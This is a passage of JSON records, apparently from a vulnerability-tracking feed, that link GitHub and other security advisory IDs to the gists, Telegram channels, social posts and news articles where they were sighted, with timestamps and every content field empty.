"GHSA-3gqm-fcw5-w839", "type": "seen", "source": "https://gist.github.com/alon710/d2b8511d121d9c8c1d87b14251d4a3da", "content": "", "creation_timestamp": "2026-09-02T21:32:05.484007Z"}, {"uuid": "4bac7868-d4a2-44ec-ad76-39edba401532", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p3m8-78j2-g5p3", "type": "seen", "source": "https://gist.github.com/alon710/c7b1744220c73bf5f0357a6534139cbd", "content": "", "creation_timestamp": "2026-09-02T20:32:56.787564Z"}, {"uuid": "f916a65a-6d0f-4bc2-9e53-7fe42a1f0ce5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gxr4-xjj5-5px2", "type": "seen", "source": "https://gist.github.com/Garneauma/78045432fb49de029a628e2c83df5c33", "content": "", "creation_timestamp": "2026-09-02T19:34:20.908339Z"}, {"uuid": "331b45f2-fe1c-49a6-875b-97f638ec0661", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jpcq-cgw6-v4j6", "type": "seen", "source": "https://gist.github.com/Garneauma/78045432fb49de029a628e2c83df5c33", "content": "", "creation_timestamp": "2026-09-02T19:34:20.615151Z"}, {"uuid": "c24f88e7-8a80-48b0-b2fc-5b271a887885", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jqff-g426-hqxp", "type": "seen", "source": "https://gist.github.com/alon710/af575107e879f298d568b88dd8bac4cb", "content": "", "creation_timestamp": "2026-09-02T19:33:12.886265Z"}, {"uuid": "71b1c675-6cfa-4bee-ae1f-fa7a7d63f48f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p433-fp4g-pc2c", "type": "seen", "source": "https://gist.github.com/yuriw/ef8702ddc244a8fe0410fc706d24105c", "content": "", "creation_timestamp": "2026-09-02T19:03:42.069699Z"}, {"uuid": "56e3c46e-dd85-4402-92e0-f0957105c35a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fph4-wmhf-6fwf", "type": "seen", "source": "https://gist.github.com/alon710/9abc2886db3d6d53b0a6da8c0c0bb7fc", "content": "", "creation_timestamp": "2026-09-02T18:33:43.452840Z"}, {"uuid": "7c6757e6-0606-4391-9fb4-cd816f5b4b06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f65p-4m7j-42xc", "type": "seen", "source": "https://gist.github.com/alon710/4dc17918da62d2577fc435c04c7ff596", "content": "", "creation_timestamp": "2026-09-02T17:33:14.537098Z"}, {"uuid": "989881d4-db8f-4404-bb08-e8c6b1145299", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-79rj-f7gj-xf33", "type": "seen", "source": "https://gist.github.com/xorj/77b2b9d5ac51b19239b32c6c15fd7148", "content": "", "creation_timestamp": "2026-09-02T17:17:00.796628Z"}, {"uuid": "7c993be7-2f28-4732-bd64-8a23651a8b1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ALE-009", "type": "seen", "source": "https://bsky.app/profile/bot-de-florian.bsky.social/post/3mukgfjrw4n2p", "content": "", "creation_timestamp": "2026-09-02T17:08:53.910241Z"}, {"uuid": "4e814c21-501b-402e-89f5-b26199c9bdb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5jgf-p345-68v8", "type": "seen", "source": "https://gist.github.com/alon710/6d6bc08cb0fafac0bb8a8c33b4c587ed", "content": "", "creation_timestamp": "2026-09-02T16:31:30.000120Z"}, {"uuid": "2edba0ef-d926-4a1e-a05c-9f555d4682f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5jgf-p345-68v8", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mukchxi4642a", "content": "", "creation_timestamp": "2026-09-02T15:58:40.574246Z"}, {"uuid": "48d103af-7697-40d8-bc50-c5b575a8a300", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h6cx-gjxx-v25c", "type": "seen", "source": "https://gist.github.com/alon710/50fd67f360d5ae23eb1087ad318df483", "content": "", "creation_timestamp": "2026-09-02T15:33:29.345402Z"}, {"uuid": "66bab472-05b6-41f1-a83f-210a7956f0d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wwv5-g3v4-889x", "type": "seen", "source": "https://gist.github.com/alon710/2024cdfc47e5cc83e297e4766f1b03a2", "content": "", "creation_timestamp": "2026-09-02T14:33:48.421849Z"}, {"uuid": "cb1c5bbd-269d-4084-8e96-3c455e40af7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8423-8FGW-73VQ", "type": "seen", "source": "https://gist.github.com/alon710/6ddd193ef693b085524dc4da97851f2c", "content": "", "creation_timestamp": "2026-09-02T14:12:39.856716Z"}, {"uuid": "38bf309d-bd7d-481d-8c7d-c6a45692f137", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-242m-9wq7-vhwq", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/117201815744827307", "content": "", "creation_timestamp": "2026-09-02T14:03:05.083249Z"}, {"uuid": "c668a571-a535-4f7e-928b-2e5238523234", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ALE-009", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/117201536283272602", "content": "", "creation_timestamp": "2026-09-02T12:52:04.377180Z"}, {"uuid": "f27ce830-0a89-4455-ba99-92f4db3a5695", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-J8PM-GJ4C-RQ4X", "type": "seen", "source": "https://gist.github.com/alon710/d11eade9d3460fb762a1734567ffc610", "content": "", "creation_timestamp": "2026-09-02T12:33:24.714804Z"}, {"uuid": "066cc159-5a6b-4a0d-abb4-6dc36812fd88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F8FG-PG57-V4J8", "type": "seen", "source": "https://gist.github.com/alon710/e6c2d9d276bdf47f7083b04607dabf57", "content": "", "creation_timestamp": "2026-09-02T11:43:47.094517Z"}, {"uuid": "a8e942bf-96b3-4379-8df4-b689fe6569aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JJV6-8J6V-6J52", "type": "seen", "source": "https://gist.github.com/alon710/c47fcd7d502f07dd0b771d6c1a947594", "content": "", "creation_timestamp": "2026-09-02T10:32:15.235956Z"}, {"uuid": "60a426f2-2f2d-4085-a6da-d6b2fa87f113", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8PJX-JJ86-J47P", "type": "seen", "source": "https://t.me/hacking_Attack/34328", "content": "", "creation_timestamp": "2026-09-01T20:02:04.777722Z"}, {"uuid": "d6704ffa-d0d6-4564-8ed4-f45cfd86a62c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M358-G4RP-533R", "type": "seen", "source": "https://t.me/hacking_Attack/44499", "content": "", "creation_timestamp": "2026-09-01T20:01:53.138567Z"}, {"uuid": "76a069bd-9828-46d3-9c7b-ec30dc073e9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-53R2-MQ99-F532", "type": "seen", "source": "https://t.me/hacking_Attack/63081", "content": "", "creation_timestamp": "2026-09-01T20:01:33.207637Z"}, {"uuid": "78fd1842-db65-42e8-aebf-c15536b2928f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-PJWM-RVH2-C87W", "type": "seen", "source": "https://t.me/hacking_Attack/76471", "content": "", "creation_timestamp": "2026-09-01T20:01:18.706147Z"}, {"uuid": "701fccef-e8ef-46aa-9e2d-3acfa5820042", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-R6JX-9G48-2R5R", "type": "seen", "source": "https://t.me/cissp/4117", "content": "", "creation_timestamp": "2026-09-01T17:00:42.062689Z"}, {"uuid": "434a290c-5042-4384-a3ef-bf4e52627023", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JFH8-C2JP-5V3Q", "type": "seen", "source": "https://t.me/cissp/5052", "content": "", "creation_timestamp": "2026-09-01T17:00:33.259024Z"}, {"uuid": "be9e12c6-d352-4ab1-a795-62f5e5f757d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5c6j-r48x-rmvq", "type": "seen", "source": "https://gist.github.com/djlan/ca67c146f0755b9b6b145ee9bfdaf3a4", "content": "", "creation_timestamp": "2026-08-31T00:26:51.972390Z"}, {"uuid": "d26f8630-af96-4987-8fc1-dccd74d43a5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-P6GQ-J5CR-W38F", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/100406", "content": "", "creation_timestamp": "2026-08-31T00:00:08.574450Z"}, {"uuid": "7ef6b41a-792b-4c77-a638-39450d046972", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-P6GQ-J5CR-W38F", "type": "seen", "source": "https://t.me/GithubRedTeam/100406", "content": "", "creation_timestamp": "2026-08-30T21:00:04.908361Z"}, {"uuid": "9cc1d7c4-f277-413b-a32a-23f1036afc99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-95c3-6vvw-4mrq", "type": "seen", "source": "https://gist.github.com/Jonas-Augustinus-Linus/ffeb04a941e4b893c5fbd0678b036c2c", "content": "", "creation_timestamp": "2026-08-30T19:10:44.276002Z"}, {"uuid": "c98e05a5-f626-4304-956c-43f04c57a18c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2v5f-5r6w-p67r", "type": "seen", "source": "https://gist.github.com/Jonas-Augustinus-Linus/ffeb04a941e4b893c5fbd0678b036c2c", "content": "", "creation_timestamp": "2026-08-30T19:10:44.216218Z"}, {"uuid": "3fad8b0a-437b-4bfb-979f-cd65251edce8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g5xc-5w98-jfvm", "type": "seen", "source": "https://gist.github.com/alon710/6f86711971bb7ed1944c7170d2f2eeef", "content": "", "creation_timestamp": "2026-08-28T23:31:57.519989Z"}, {"uuid": "c7608041-2cab-43ae-9884-11487c2ba2bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x626-fcwx-f5pc", "type": "seen", "source": "https://gist.github.com/alon710/e4bd6c41f3caf02d2208d3310d5a1edf", "content": "", "creation_timestamp": "2026-08-28T22:32:24.334728Z"}, {"uuid": "0918cb46-d84f-486d-bab1-3a8b98f16b19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mrpp-v6pg-p54x", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mu6fgl7bp42g", "content": "", "creation_timestamp": "2026-08-28T22:19:38.324607Z"}, {"uuid": "edc5afe0-709b-484f-911d-c22c86b05426", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7g4w-cg88-2cq2", "type": "seen", "source": "https://thehackernews.com/2026/08/cosmos-evm-flaw-exploited-after-cosmos.html", "content": "", "creation_timestamp": "2026-08-28T22:00:41.389261Z"}, {"uuid": "ee799e74-75d0-4760-ba4c-ffc2965b507e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p378-jp5r-gpgw", "type": "seen", "source": "https://gist.github.com/alon710/f6616451da7f3f1b989952d24a3d867c", "content": "", "creation_timestamp": "2026-08-28T21:31:53.852218Z"}, {"uuid": "2474e26d-eeaf-42bd-a641-e78ee36fb616", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7g4w-cg88-2cq2", "type": "seen", "source": "https://bsky.app/profile/newssecia.bsky.social/post/3mu6ax42wfx2g", "content": "", "creation_timestamp": "2026-08-28T20:59:24.621341Z"}, {"uuid": "8a683783-afaa-410b-a05a-f4b38a588745", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r82h-mqw3-fc56", "type": "seen", "source": "https://gist.github.com/alon710/0c57b295c1c8fe9eb4b1e012f4bf501d", "content": "", "creation_timestamp": "2026-08-28T19:31:36.957780Z"}, {"uuid": "1d00085b-647a-4b0b-b735-f5646a7a54d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r82h-mqw3-fc56", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mu62veuezb2g", "content": "", "creation_timestamp": "2026-08-28T19:11:03.613702Z"}, {"uuid": "d052f62a-4276-4daa-a721-ddb4e6de465a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8frh-vhgh-64cf", "type": "seen", "source": "https://gist.github.com/alon710/cba9cd0b7b8bf1e82dc1ef5c661263b6", "content": "", "creation_timestamp": "2026-08-28T18:32:25.181749Z"}, {"uuid": "5de6bb95-33e4-46df-bc0e-8f6b90a102f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w3rx-r6r6-pgpr", "type": "seen", "source": "https://gist.github.com/alexjohnbyrne44/f77a0ac2192c769065a4fcc0db1ff771", "content": "", "creation_timestamp": "2026-08-28T17:56:32.814710Z"}, {"uuid": "3c6a1ded-3d3a-4365-a46b-5136f69dd751", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5p2g-fcmc-qvqq", "type": "seen", "source": "https://gist.github.com/alexjohnbyrne44/f77a0ac2192c769065a4fcc0db1ff771", "content": "", "creation_timestamp": "2026-08-28T17:56:32.716926Z"}, {"uuid": "a6cf9faf-6fde-47f0-85fa-9c0665b07e74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x8mj-6p3q-g5pp", "type": "seen", "source": "https://gist.github.com/alon710/6afc3d410daf4fc14ca37ccd754d5535", "content": "", "creation_timestamp": "2026-08-28T17:33:07.309825Z"}, {"uuid": "acebe1a2-1607-4bbc-88c0-a1d250273070", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8jqh-95g6-7jpj", "type": "seen", "source": "https://gist.github.com/alon710/c1d8520d53bfcef788cd28dc6c9eb99d", "content": "", "creation_timestamp": "2026-08-28T16:32:37.897301Z"}, {"uuid": "55a14b1d-4a67-4ba4-8892-f613df179a2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q6fp-rfwr-759p", "type": "seen", "source": "https://gist.github.com/abhi04anon/8ce0b68a5a7dda8a0501cbaf933173eb", "content": "", "creation_timestamp": "2026-08-28T15:25:39.330377Z"}, {"uuid": "940ea791-dce7-4336-b7c5-b60a1795ab09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6PG3-CHWQ-WGQC", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3418", "content": "", "creation_timestamp": "2026-08-28T15:00:05.014216Z"}, {"uuid": "79e0b84b-e7fd-4972-aa27-ba20181fa3ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rgw5-rvv9-x895", "type": "seen", "source": "https://gist.github.com/konard/4ba388beb31caacd09fbc15019f8e274", "content": "", "creation_timestamp": "2026-08-28T09:36:02.167562Z"}, {"uuid": "549bd484-1622-4ad3-9c85-fdeaa257bf5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mh99-v99m-4gvg", "type": "seen", "source": "https://gist.github.com/konard/4ba388beb31caacd09fbc15019f8e274", "content": "", "creation_timestamp": "2026-08-28T09:35:37.872961Z"}, {"uuid": "fad468c0-55ab-4db7-8aac-6459e8d1bb79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mrrh-fwg8-r2c3", "type": "seen", "source": "https://gist.github.com/konard/4ba388beb31caacd09fbc15019f8e274", "content": "", "creation_timestamp": "2026-08-28T09:35:32.484655Z"}, {"uuid": "71835529-3457-40a4-8d17-9fe0b066187a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F558-MP87-58VJ", "type": "seen", "source": "https://t.me/cve0day/270", "content": "", "creation_timestamp": "2026-08-27T15:00:12.558428Z"}, {"uuid": "55e7eb52-a9e1-41aa-9fee-221aa0301da8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vmm3-xgcx-67hm", "type": "seen", "source": "https://gist.github.com/alon710/99c22712e41b7fe8f253e2a2cd13cc6a", "content": "", "creation_timestamp": "2026-08-27T09:34:14.830041Z"}, {"uuid": "e5deccae-91af-463e-a667-6b21c99639ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6x9p-4r67-5gjx", "type": "seen", "source": "https://gist.github.com/alon710/3db07e14b08e03003c4cb301f74837ed", "content": "", "creation_timestamp": "2026-08-27T09:34:14.638483Z"}, {"uuid": "878685fe-007a-4674-b551-0cbcbc6751a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6ccx-9c9f-327w", "type": "seen", "source": "https://gist.github.com/alon710/54b5d53eeeb09b8b5b899def091e09f5", "content": "", "creation_timestamp": "2026-08-26T08:31:40.829312Z"}, {"uuid": "1b3edcec-8345-43ac-83c5-f93e196108f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p7x2-g5cq-fhmq", "type": "seen", "source": "https://gist.github.com/alon710/61d0254c7e615b862b27242bae8aadcf", "content": "", "creation_timestamp": "2026-08-26T08:09:19.856654Z"}, {"uuid": "ec323f94-f94d-41aa-8866-3a44a83b9916", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hvfh-5mj3-5f3j", "type": "seen", "source": "https://gist.github.com/alon710/cd9e29ae1307bd41a5c652b5662f31b2", "content": "", "creation_timestamp": "2026-08-25T22:31:31.593990Z"}, {"uuid": "b142c80d-c2eb-4ed0-9d03-695f63f06b63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cv84-9p8j-fj68", "type": "seen", "source": "https://gist.github.com/alon710/c546d90432dcc6f5c367a6df4e89153b", "content": "", "creation_timestamp": "2026-08-25T21:34:19.013569Z"}, {"uuid": "8155eab1-0da2-4724-a698-febb1d7355cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p43p-whwx-q52h", "type": "seen", "source": "https://gist.github.com/alon710/4b4569a59147cbf248fba613069c312c", "content": "", "creation_timestamp": "2026-08-25T20:33:25.182212Z"}, {"uuid": "95f13893-db53-45e6-8909-611fad460afa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gx4c-2hqx-cw2r", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/117157604721602110", "content": "", "creation_timestamp": "2026-08-25T18:39:38.266587Z"}, {"uuid": "8f0e9d3c-15a0-4eb2-bc40-021142c3a9d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VWF3-4XXJ-QG6H", "type": "seen", "source": "https://gist.github.com/alon710/e486edf9fad254ea700b7883cbb95dbf", "content": "", "creation_timestamp": "2026-08-25T18:31:43.904418Z"}, {"uuid": "0fded31d-6fb9-4a72-aae7-d1f3dc05271a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vwf3-4xxj-qg6h", "type": "seen", "source": "https://bsky.app/profile/kyisaiah47.kynth.studio/post/3mtweqps6u22t", "content": "", "creation_timestamp": "2026-08-25T17:46:07.012935Z"}, {"uuid": "6cb0efea-1baa-4c61-8193-c85db759b17a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qj6x-xx2h-8hvv", "type": "seen", "source": "https://gist.github.com/alon710/fe6f5c87f44e8737a1f8abea57fa2cd5", "content": "", "creation_timestamp": "2026-08-25T17:32:46.070210Z"}, {"uuid": "8a5fdc41-0ba6-4cbe-9507-c7c594cba89b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180328-SMI2", "type": "published-proof-of-concept", "source": "https://t.me/informationsec/2587", "content": "", "creation_timestamp": "2026-08-23T00:00:37.221542Z"}, {"uuid": "3cbf36b8-e712-4ad6-8e25-88eb9d14c842", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gcr2-9v8m-gq45", "type": "seen", "source": "https://gist.github.com/alon710/04fe710f98161277ec0196216da2a5ca", "content": "", "creation_timestamp": "2026-09-03T09:06:28.831522Z"}, {"uuid": "71ff21b6-2c62-451a-95a3-555ba34b20e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5JP3-339H-VXQW", "type": "seen", "source": "https://t.me/GithubRedTeam/100896", "content": "", "creation_timestamp": "2026-09-03T09:00:05.846946Z"}, {"uuid": "e3644840-c905-49ef-b648-6f7c6fababc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-75mr-qw9x-3r39", "type": "seen", "source": "https://gist.github.com/alon710/3dcd56ab41cf2fc234bc88855814c85c", "content": "", "creation_timestamp": "2026-09-03T07:31:59.738702Z"}, {"uuid": "76d4be97-9477-43f0-a185-6c5eac37c37e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gv5w-hfx8-8cwq", "type": "seen", "source": "https://gist.github.com/alon710/973db52eb7701f6319f995cd1192baf0", "content": "", "creation_timestamp": "2026-09-03T06:33:08.605756Z"}, {"uuid": "7316079f-7f81-41a3-b84e-997666b9a987", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w878-pj84-3j5v", "type": "seen", "source": "https://gist.github.com/alon710/25d950fb1b775a5961200e6e2792284d", "content": "", "creation_timestamp": "2026-09-03T05:32:21.137908Z"}, {"uuid": "8277a051-f061-4e4c-b108-d5fed6a3990f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qh9r-j7rp-4x2m", "type": "seen", "source": "https://gist.github.com/alon710/4cc3ecb49324472f51ec38f524b61b28", "content": "", "creation_timestamp": "2026-09-03T03:32:56.113293Z"}, {"uuid": "af0e4a17-697f-4bf4-9b61-af5f931444ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-52gf-6rpq-fgmx", "type": "seen", "source": "https://gist.github.com/alon710/fa4c1447c893b6cd0a1784fbaa13a97e", "content": "", "creation_timestamp": "2026-09-03T02:33:27.767476Z"}, {"uuid": "051046a6-8960-4cfe-90af-9a3403d0a87d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6f2q-w3r8-xxhj", "type": "seen", "source": "https://bsky.app/profile/lazarusholic.bsky.social/post/3muldmfy4222y", "content": "", "creation_timestamp": "2026-09-03T01:51:43.471099Z"}, {"uuid": "ede6bc95-c5b9-4072-8040-69fb54ebb5ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c5f6-2rm9-2w8g", "type": "seen", "source": "https://gist.github.com/alon710/334e1eb2f1175b3ba4114070f1401a17", "content": "", "creation_timestamp": "2026-09-03T01:32:19.696690Z"}, {"uuid": 